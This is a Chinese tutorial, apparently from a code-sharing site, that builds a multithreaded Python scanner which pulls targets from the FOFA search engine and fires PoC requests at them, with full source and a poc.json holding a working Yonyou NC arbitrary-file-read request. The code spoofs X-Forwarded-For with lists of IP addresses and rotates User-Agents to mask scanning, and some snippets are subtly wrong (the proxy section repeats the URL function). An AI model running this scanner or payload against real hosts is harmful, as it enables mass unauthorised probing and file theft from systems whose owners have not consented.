POC漏洞批量验证程序Python脚本编写

目录
  • 编写目的
  • 需求分析
  • 实现过程
  • Main函数
  • 获取目标
  • 批量请求验证
    • 加载POC
    • 多线程类
    • urlParse
    • getProxy
    • randomHeaders
  • 输出结果
  • 其他
    • 全局变量
    • 命令行读取参数
    • poc详情显示
    • Ctrl+C结束线程
    • poc.json文件
  • 运行结果
    • FoFa获取目标
  • poc验证
  • 总结
  • 完整代码

编写目的

批量验证poc,Python代码练习。

需求分析

  • 1、poc尽可能简单。
  • 2、多线程。
  • 3、联动fofa获取目标。
  • 4、随机请求头.

实现过程

脚本分为三个模块,获取poc及目标、多线程批量请求验证、输出结果。其中批量请求验证包括构造多线程,修改请求参数,发送请求三个部分。

Main函数

在main函数中,主要有三个部分获取poc及目标,多线程(将目标填充到队列,创建多线程并启动)、输出结果。
具体实现如下:

def main():
    # 响应Ctrl+C停止程序
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)
    showpocs()
    ## 获取目标
    targetList = getTarget()
    ## 多线程批量请求验证
    thread(targetList)
    ## 输出结果
    putTarget(List)

获取目标

关于目标来源,设计单个目标、从文件中读取多个目标以及根据FoFa语法从FOFA_API中获取目标三种方式。

定义函数getTarget,函数分为两个部分

第一部分为根据 -f Fofa语法 获取目标,默认数目为30条,

第二部分为根据 -u url / -i file / -f num(数目,默认为10)获取要请求验证的目标,两部分以是否传参poc参数区别,最后返回一个targetList列表。

具体实现如下:

def getTarget():
    targetList=[]
    count=0
    if result.poc==None:
        if result.outfile!=None and result.fofa!=None :
            # FOFA读取目标
            if result.fofa!=None:
                qbase=result.fofa
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                print("FOFA搜索:"+qbase)
                fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size=30"
                try:
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    filepath=result.outfile
                    with open(filepath,'w') as targets:
                        for i in results['results']:
                            targets.write(i[1]+'\n')
                            print(i[1])
                            count+=1
                        print("搜索结果有"+str(count)+"条,已保存在"+filepath+"里!")
                except Exception as e:
                    print(e)
            sys.exit()
    else:
        if result.url!=None or result.file!=None or result.fofa!=None:
            # 单个目标
            if result.url!=None:
                targetList.append(result.url)
            # 文件读取目标
            if result.file!=None:
                try:
                    filepath=result.file
                    with open(filepath,'r') as targets:
                        for target in targets.readlines():
                           targetList.append(target.strip())
                except Exception as e:
                    print(e)
            # FOFA读取目标
            if result.fofa!=None:
                qbase=""
                pocName = result.poc
                with open('poc.json',encoding='UTF-8') as f:
                    data = json.load(f)
                    for poc in data:
                        if pocName == poc:
                            qbase=data[poc]['fofa']
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                try:
                    fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size="+str(result.fofa)
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    print("FOFA搜索:"+qbase)
                    print("搜索结果:"+str(result.fofa)+"条")
                    for i in results['results']:
                        targetList.append(i[1])
                    # print(targetList)
                except Exception as e:
                    print(e)
            return targetList
        else :
            sys.exit("参错有误!缺少目标!")

批量请求验证

定义thread函数,封装多线程请求相关代码,需传入获取到的目标参数targetList。
具体实现如下:

def thread(targetList):
    ## 获取poc
    poc=poc_load()
    ## 填充队列
    queueLock.acquire()
    for target in targetList:
        targetQueue.put(target)
    queueLock.release()
    ## 创建线程
    threadList = []
    threadNum=result.threadNum
    for i in range(0,threadNum):
        t=reqThread(targetQueue,poc)
        t.setDaemon(True)
        threadList.append(t)
    for i in threadList:
        i.start()
    # 等待所有线程完成
    for t in threadList:
        t.join()

加载POC

请求验证必须使用 -p pocName参数指定要使用的POC,所有POC在poc.json文件中存储。

具体实现如下

# 加载poc
def poc_load():
    if result.poc!=None:
        poc = result.poc
        isPoc = False # POC是否存在
        # 读取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            for key in data:
                if poc == key:
                    isPoc=True
        if isPoc==False:
            print("POC 不存在!")
            sys.exit("请通过--show查看poc列表!")
        else:
            return data[poc]
    else:
        pass

多线程类

定义reqThread线程类,传入队列以及poc两个参数,封装req请求方法。
具体实现如下:

class reqThread (threading.Thread):
    def __init__(self, q,poc):
        threading.Thread.__init__(self)
        self.q = q
        self.poc=poc
    def run(self):
        try:
            while not self.q.empty():
                queueLock.acquire()
                target=self.q.get()
                queueLock.release()
                if self.req(target):
                    print(target+" is vuln !")
                    List.append(target)
                else:
                    pass
        except Exception as e:
            pass
    def req(self,url):
        poc=self.poc
        payload=urlParse(url)+poc['request']['url']
        res=requests.request(method=poc['request']['method'],url=payload,headers=randomheaders(poc),proxies=getProxy(),data=poc['request']['data'],verify=False,timeout=5)
        if res.status_code==200 and poc['request']['confirm'] in res.text:
            return True
        else:
            return False

其中在req中的请求方法内,存在三个修改请求的方法。

urlParse

对获取到的目标进行文本处理。

# 处理url
def urlParse(url):
     if "https://" not in url:
        if "http://" in url:
            url=url
        else:
            url="http://"+url
     return url

getProxy

指定请求代理。

# 代理
def urlParse(url):
     if "https://" not in url:
        if "http://" in url:
            url=url
        else:
            url="http://"+url
     return url

randomHeaders

添加随机User-Agent、referer、XFF等请求头参数值。

def randomHeaders(poc):
    headers={}
    uaList=[
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/12.8.2.1268 Mobile AliApp(TUnionSDK/0.1.20.3)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/11.18.0.16 (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList=[
        "www.baidu.com"
    ]
    xffList=[
        '127.0.0.1',
        '51.77.144.148',
        '80.93.212.46',
        '109.123.115.10',
        '187.44.229.50',
        '190.14.232.58',
        '5.166.57.222',
        '36.94.142.165',
        '52.149.152.236',
        '68.15.147.8',
        '188.166.215.141',
        '190.211.82.174',
        '101.51.139.179'
    ]
    if 'User-Agent' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['User-Agent']=poc['request']['headers']['User-Agent']
        else:
            headers['User-Agent']=random.choice(uaList)
    if 'referer' in poc['request']['headers']:
        if poc['request']['headers']['referer'].strip()!='':
            headers['referer']=poc['request']['headers']['referer']
        else:
            headers['referer']=random.choice(refList)
    if 'X-Forwarded-For' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['X-Forwarded-For']=poc['request']['headers']['X-Forwarded-For']
        else:
            headers['X-Forwarded-For']=random.choice(xffList)
    for key in poc['request']['headers']:
        if key != "referer" and  key != "User-Agent"  and key != "X-Forwarded-For":
            headers[key]=poc['request']['headers'][key]
    return headers

输出结果

定义全局变量List,储存要输出的目标,定义输出方法putTarget。
具体实现如下:

List=[]
## 输出
def putTarget(resultList):
    if result.file!=None or result.fofa!=None:
        if len(resultList)!=0 :
            if result.outfile != None :
                filepath=result.outfile
                with open(filepath,'w') as targets:
                     for target in resultList:
                        targets.write(target+'\n')
                print("验证结果有"+str(len(resultList))+"条,已保存在"+filepath+"里!")
        else:
            print("没有发现存在漏洞的目标!")
    else:
        pass

其他

全局变量

# 忽略https告警
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## 队列
targetQueue = queue.Queue(100)
## 锁
queueLock = threading.Lock()
# 结果
List=[]
# FoFA
email=""
key=""

命令行读取参数

arg = ArgumentParser(description='POC_Verify')
arg.add_argument('-u', dest='url',help='Target URL',type=str)
arg.add_argument('-i', '--file', dest='file',help='Scan multiple targets given in a textual file',type=str)
arg.add_argument('-f',"--fofa", dest='fofa',help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30',default=10)
arg.add_argument('-p', dest='poc',help=' Load POC file from poc.json')
arg.add_argument('-proxy', dest='proxy',help='Use a proxy to connect to the target URL Example : -proxy http:127.0.0.1:8080',type=str)
arg.add_argument('-t', dest='threadNum',help='the thread_count,default=10',  type=int, default=10)
arg.add_argument('-show', dest='show', help='show all pocs',nargs='?',const='all',type=str)
arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result',  default='result.txt',type=str)
result = arg.parse_args()

poc详情显示

## 显示poc
def showpocs():
    isPoc = False
    if result.show != None:
        # 读取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            if result.show== "all":
                print("pocname".ljust(20),"description".ljust(20))
                print("----------------------------------------------")
                for key in data:
                    print(key.ljust(20),data[key]['name'].ljust(20))
            else:
                if  result.show in data:
                    print("pocname".ljust(20),"description".ljust(20))
                    print("----------------------------------------------")
                    print(result.show.ljust(20),data[result.show]['name'].ljust(20))
        sys.exit()
    else:
        pass

Ctrl+C结束线程

# 停止程序
def quit(signum, frame):
    print('You choose to stop me.')
    sys.exit()
def main():
    # 响应Ctrl+C停止程序
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)

poc.json文件

poc本质为一次HTTP请求,本着简单的原则,仅设计名称、联动fofa的语法、请求头、请求内容、以及验证漏洞存在回显的内容5个字段。

{
    "pocname": {
        "name":"漏洞描述",
                "fofa":"fofa搜索字符串,特殊符号需要转义",
        "request": {
            "method": "",
            "url":"",
            "headers": {
                "referer": "",
                "User-Agent": "",
                "X-Forwarded-For": "",
                "Content-Type": ""
            },
            "data": "",
            "confirm": "回显字符串"
        }
    },
    "yonyounc": {
        "name": "用友NC 任意文件读取",
                "fofa":"app=\"用友-UFIDA-NC\"",
        "request": {
            "method": "get",
            "url": "/NCFindWeb?service=IPreAlertConfigService&filename=index.jsp",
            "headers": {
            "referer": "",
                    "User-Agent": "",
                    "X-Forwarded-For": ""
                },
            "data": "",
            "confirm": "<%@ page language="
        }
    }
}

运行结果

FoFa获取目标

poc验证

总结

代码实现基本功能,已暂时符合自己使用需求,此次实践已完成编写目的,但一些容错机制以及细小功能点还需完善,如输入为空程序运行结果,以及代理模块功能待实现。

通过此次编程,在熟悉Python编程的同时也深感代码功底的薄弱。

不过最后还是学习到不少知识,比如多线程、读写文件、数据类型操作、命令行参数读取、编程模块化思想等。
  

之后可以多尝试使用python编写小demo工具,避免对编程思维生疏。

完整代码

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from argparse import ArgumentParser
import json
import base64
import random
import threading
import queue
import time
import sys,signal
# 忽略https告警
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## 队列
targetQueue = queue.Queue(100)
## 锁
queueLock = threading.Lock()
# 结果
List=[]
# FoFA
email=""
key=""
arg = ArgumentParser(description='POC_Verify')
arg.add_argument('-u', dest='url',help='Target URL',type=str)
arg.add_argument('-i', '--file', dest='file',help='Scan multiple targets given in a textual file',type=str)
arg.add_argument('-f',"--fofa", dest='fofa',help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30',default=10)
arg.add_argument('-p', dest='poc',help=' Load POC file from poc.json')
arg.add_argument('-proxy', dest='proxy',help='Use a proxy to connect to the target URL Example : -proxy http:127.0.0.1:8080',type=str)
arg.add_argument('-t', dest='threadNum',help='the thread_count,default=10',  type=int, default=10)
arg.add_argument('-show', dest='show', help='show all pocs',nargs='?',const='all',type=str)
arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result',  default='result.txt',type=str)
result = arg.parse_args()
class reqThread (threading.Thread):
    def __init__(self, q,poc):
        threading.Thread.__init__(self)
        self.q = q
        self.poc=poc
    def run(self):
        try:
            while not self.q.empty():
                queueLock.acquire()
                target=self.q.get()
                queueLock.release()
                if self.req(target):
                    print(target+" is vuln !")
                    List.append(target)
                else:
                    pass
        except Exception as e:
            pass
    def req(self,url):
        poc=self.poc
        payload=urlParse(url)+poc['request']['url']
        res=requests.request(method=poc['request']['method'],url=payload,headers=randomHeaders(poc),proxies=getProxy(),data=poc['request']['data'],verify=False,timeout=5)
        if res.status_code==200 and poc['request']['confirm'] in res.text:
            return True
        else:
            return False
## IP代理
def getProxy():
    proxy={}
    if result.proxy!= None:
        proxy[result.proxy[:result.proxy.index(":")]]=result.proxy[result.proxy.index(":")+1:]
    return proxy
# 处理url
def urlParse(url):
     if "https://" not in url:
        if "http://" in url:
            url=url
        else:
            url="http://"+url
     return url
# 随机更换User-Agent、XFF、referer
def randomHeaders(poc):
    headers={}
    uaList=[
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/12.8.2.1268 Mobile AliApp(TUnionSDK/0.1.20.3)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/11.18.0.16 (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList=[
        "www.baidu.com"
    ]
    xffList=[
        '127.0.0.1',
        '51.77.144.148',
        '80.93.212.46',
        '109.123.115.10',
        '187.44.229.50',
        '190.14.232.58',
        '5.166.57.222',
        '36.94.142.165',
        '52.149.152.236',
        '68.15.147.8',
        '188.166.215.141',
        '190.211.82.174',
        '101.51.139.179'
    ]
    if 'User-Agent' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['User-Agent']=poc['request']['headers']['User-Agent']
        else:
            headers['User-Agent']=random.choice(uaList)
    if 'referer' in poc['request']['headers']:
        if poc['request']['headers']['referer'].strip()!='':
            headers['referer']=poc['request']['headers']['referer']
        else:
            headers['referer']=random.choice(refList)
    if 'X-Forwarded-For' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['X-Forwarded-For']=poc['request']['headers']['X-Forwarded-For']
        else:
            headers['X-Forwarded-For']=random.choice(xffList)
    for key in poc['request']['headers']:
        if key != "referer" and  key != "User-Agent"  and key != "X-Forwarded-For":
            headers[key]=poc['request']['headers'][key]
    return headers
# 获取目标
def getTarget():
    targetList=[]
    count=0
    if result.poc==None:
        if result.outfile!=None and result.fofa!=None :
            # FOFA读取目标
            if result.fofa!=None:
                qbase=result.fofa
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                print("FOFA搜索:"+qbase)
                fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size=30"
                try:
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    filepath=result.outfile
                    with open(filepath,'w') as targets:
                        for i in results['results']:
                            targets.write(i[1]+'\n')
                            print(i[1])
                            count+=1
                        print("搜索结果有"+str(count)+"条,已保存在"+filepath+"里!")
                except Exception as e:
                    print(e)
            sys.exit()
    else:
        if result.url!=None or result.file!=None or result.fofa!=None:
            # 单个目标
            if result.url!=None:
                targetList.append(result.url)
            # 文件读取目标
            if result.file!=None:
                try:
                    filepath=result.file
                    with open(filepath,'r') as targets:
                        for target in targets.readlines():
                           targetList.append(target.strip())
                except Exception as e:
                    print(e)
            # FOFA读取目标
            if result.fofa!=None:
                qbase=""
                pocName = result.poc
                with open('poc.json',encoding='UTF-8') as f:
                    data = json.load(f)
                    for poc in data:
                        if pocName == poc:
                            qbase=data[poc]['fofa']
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                try:
                    fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size="+str(result.fofa)
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    print("FOFA搜索:"+qbase)
                    print("搜索结果:"+str(result.fofa)+"条")
                    for i in results['results']:
                        targetList.append(i[1])
                    # print(targetList)
                except Exception as e:
                    print(e)
            return targetList
        else :
            sys.exit("参错有误!缺少目标!")
# 加载poc
def poc_load():
    if result.poc!=None:
        poc = result.poc
        isPoc = False
        # 读取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            for key in data:
                if poc == key:
                    isPoc=True
        if isPoc==False:
            print("POC 不存在!")
            sys.exit("请通过--show查看poc列表!")
        else:
            return data[poc]
    else:
        pass
## 输出
def putTarget(resultList):
    if result.file!=None or result.fofa!=None:
        if len(resultList)!=0 :
            if result.outfile != None :
                filepath=result.outfile
                with open(filepath,'w') as targets:
                     for target in resultList:
                        targets.write(target+'\n')
                print("验证结果有"+str(len(resultList))+"条,已保存在"+filepath+"里!")
        else:
            print("没有发现存在漏洞的目标!")
    else:
        pass
## 显示poc
def showpocs():
    isPoc = False
    if result.show != None:
        # 读取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            if result.show== "all":
                print("pocname".ljust(20),"description".ljust(20))
                print("----------------------------------------------")
                for key in data:
                    print(key.ljust(20),data[key]['name'].ljust(20))
            else:
                if  result.show in data:
                    print("pocname".ljust(20),"description".ljust(20))
                    print("----------------------------------------------")
                    print(result.show.ljust(20),data[result.show]['name'].ljust(20))
        sys.exit()
    else:
        pass
# 停止程序
def quit(signum, frame):
    print('You choose to stop me.')
    sys.exit()
def thread(targetList):
    ## 获取poc
    poc=poc_load()
    ## 填充队列
    queueLock.acquire()
    for target in targetList:
        targetQueue.put(target)
    queueLock.release()
    ## 创建线程
    threadList = []
    threadNum=result.threadNum
    for i in range(0,threadNum):
        t=reqThread(targetQueue,poc)
        t.setDaemon(True)
        threadList.append(t)
    for i in threadList:
        i.start()
    # 等待所有线程完成
    for t in threadList:
        t.join()
def main():
    # 响应Ctrl+C停止程序
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)
    showpocs()
    ## 获取目标
    targetList = getTarget()
    ## 多线程批量请求验证
    thread(targetList)
    ## 输出结果
    putTarget(List)
if __name__ == '__main__':
    main()

以上就是POC漏洞批量验证程序Python脚本编写的详细内容,更多关于python脚本编写POC批量漏洞验证的资料请关注我们其它相关文章!

(0)

相关推荐

  • python简单验证码识别的实现方法

    利用SVM向量机进行4位数字验证码识别 主要是思路和步骤如下: 一,素材收集 检查环境是否包含有相应的库: 1.在cmd中,通过 pip list命令查看安装的库 2.再使用pip installRequests 安装Requests库 3.再次使用pip list 命令 4.利用python获取验证码资源 编写代码:_DownloadPic.py #!/usr/bin/nev python3 #利用python从站点下载验证码图片 import requests ## 1.在 http://w

  • python实现自动化脚本编写

    目录 1. 打开浏览器,访问p.to 2. 登陆 3. 修改管理员密码 4. 单元测试数据 5. 检查输入的数据合法性 6. 获取输入错误数据之后的页面提示语 7. 编写测试用例 8.编写单元测试类 8.1 单元测试中的通用操作 8.2 测试类 9. 进行单元测试并生成测试报告 10. 关闭浏览器 11. 异常处理 11.1 点击函数 11.2 填写表单 11.3 元素加载 12. 完整的测试代码 本文以修改用户名密码单元为案例,编写测试脚本.完成修改用户名密码模块单元测试. (ps.这个dem

  • python爬虫_自动获取seebug的poc实例

    简单的写了一个爬取www.seebug.org上poc的小玩意儿~ 首先我们进行一定的抓包分析 我们遇到的第一个问题就是seebug需要登录才能进行下载,这个很好处理,只需要抓取返回值200的页面,将我们的headers信息复制下来就行了 (这里我就不放上我的headers信息了,不过headers里需要修改和注意的内容会在下文讲清楚) headers = { 'Host':******, 'Connection':'close', 'Accept':******, 'User-Agent':*

  • 用Python写漏洞验证脚本的代码

    小白尝试写任意文件读取poc 我是一个小白,完全不懂Python,但是Python在渗透中往往是一个重要的角色.有一个CSDN百万大佬写了这样一句话,不会编程的渗透都是耍流氓.我虽然菜但是也想尝试学习写一下Python漏洞的poc和exp. 我是在网上找到的学习方法,随便记录一下.尝试写一个批量验证漏洞的poc发现小米路由器有一个任意文件读取漏洞,学着写了看看 小米路由器远程任意文件读取漏洞小米路由器远程任意文件读取漏洞(CVE-2019-18371)小米路由器的Nginx的配置文件错误,导致目

  • 使用Python实现批量ping操作方法

    在日常的工作中,我们通常会有去探测目标主机是否存活的应用场景,单个的服务器主机可以通过计算机自带的DOS命令来执行,但是业务的存在往往不是单个存在的,通常都是需要去探测C段的主机(同一个网段下的存活主机),这样使用DOS来进行操作是不可取,探测的速度太慢了,不满足实际需要.一般批量的操作需要使用脚本进行一键部署执行,本文主要通过使用Python语言来实现批量ping的操作(使用多线程实现Python批量处理) Python版本 :Python3 使用的第三方库:subprocess, loggi

  • POC漏洞批量验证程序Python脚本编写

    目录 编写目的 需求分析 实现过程 Main函数 获取目标 批量请求验证 加载POC 多线程类 urlParse getProxy randomHeaders 输出结果 其他 全局变量 命令行读取参数 poc详情显示 Ctrl+C结束线程 poc.json文件 运行结果 FoFa获取目标 poc验证 总结 完整代码 编写目的 批量验证poc,Python代码练习. 需求分析 1.poc尽可能简单. 2.多线程. 3.联动fofa获取目标. 4.随机请求头. 实现过程 脚本分为三个模块,获取poc

  • 利于python脚本编写可视化nmap和masscan的方法

    介绍 我编写了一个快速且带有斑点的python脚本,以可视化nmap和masscan的结果.它通过解析来自扫描的XML日志并生成所扫描IP范围的直观表示来工作.以下屏幕截图是输出示例: 由于缺少更好的词,我将从现在开始将输出称为地图.每个主机由一个彩色正方形表示.覆盖地图大部分内容的浅蓝色方块表示主机处于脱机状态(或仅未响应masscan的SYN.)其他彩色方块表示处于联机状态且具有开放端口的主机.正方形的颜色从蓝色到红色.正方形越红,表示主机上打开的端口越多.将鼠标悬停在每个方块上,将在工具提

  • Python脚本调试工具安装过程

    Pycharm工具 前言 好的学习是离不开一个好的工具,今天分享一下一款用于python脚本编写以及调试的工具--PyCharm Community Edition.正常情况下我们可以从官网下载或者从电脑管家的软件管理中搜索下载,这里提供一下官网下载地址:https://pycharm-community-edition.en.softonic.com/(ps:安装完成后涉及授权期限)不过国内破解版很多,小伙伴们可以自行下载. 本文详细介绍一下,他的安装过程,我是安装两三次才成功,属实非傻瓜式一

  • Python脚本实现Web漏洞扫描工具

    这是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞.SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的.以下是使用说明和源代码. 一.使用说明: 1.运行环境: Linux命令行界面+Python2.7 2.程序源码: Vim scanner//建立一个名为scanner的文件 Chmod a+xscanner//修改文件权限为可执行的 3.运行程序: Python scanner//运行文件 若没有携

  • 使用Python脚本实现批量网站存活检测遇到问题及解决方法

    做渗透测试的时候,有个比较大的项目,里面有几百个网站,这样你必须首先确定哪些网站是正常,哪些网站是不正常的.所以自己就编了一个小脚本,为以后方便使用. 具体实现的代码如下: #!/usr/bin/python # -*- coding: UTF-8 -*- ''' @Author:joy_nick @博客:http://byd.dropsec.xyz/ ''' import requests import sys f = open('url.txt', 'r') url = f.readline

  • 微信小程序跳一跳游戏 python脚本跳一跳刷高分技巧

    前言 小程序跳一跳最近很火,之前爆出微信游戏小程序漏洞,网上也不乏大神.这里就用一大神的python脚本来刷下高分. 跳一跳python脚本传送门 配置过程 注: 电脑环境未配置python环境,请自行谷歌或者百度配置,这里不再做叙述. 1. 将上述传送门整个项目拷贝到本地(用git命令,或者直接压缩包下载,这里大家随意).比如我这里下载压缩包,解压我电脑以下的目录. 2. 楼主用的是 ios , 操作起来比较繁琐,也懒得找测试要 Android 测试机,所有就下了模拟器测试,首推雷电模拟器,安

  • Java程序中实现调用Python脚本的方法详解

    本文实例讲述了Java程序中实现调用Python脚本的方法.分享给大家供大家参考,具体如下: 在程序开发中,有时候需要Java程序中调用相关Python脚本,以下内容记录了先关步骤和可能出现问题的解决办法. 1.在Eclipse中新建Maven工程: 2.pom.xml文件中添加如下依赖包之后update maven工程: <dependency> <groupId>org.python</groupId> <artifactId>jython</ar

  • 详解基于Android的Appium+Python自动化脚本编写

    1.Appium Appium是一个开源测试自动化框架,可用于原生,混合和移动Web应用程序测试, 它使用WebDriver协议驱动iOS,Android和Windows应用程序. 通过Appium,我们可以模拟点击和屏幕的滑动,可以获取元素的id和classname,还可以根据操作生成相关的脚本代码. 下面开始Appium的配置. appPackage和APPActivity的获取 任意下载一个app 解压 但是解压出来的xml文件可能是乱码,所以我们需要反编译文件. 逆向AndroidMan

  • C语言中程序如何调用Python脚本

    有时候在写C语言程序的时候又想利用一下python强大的模块,于是C与python的混合编程便应运而生. 下面简单说说在C语言编译环境中调用python脚本文件的基础应用. 一.环境配置 以vs2017为例. 0x00 平台 首先你要知道你电脑上安装的python环境是64位还是32位,vs的编译平台需要与python环境一致. 比如我的python环境是64位,vs工程就要配置成x64. 右键点击你的解决方案,点击属性, 0x01 添加 包含目录 和 库目录 在属性窗口双击"VC++ Dire

随机推荐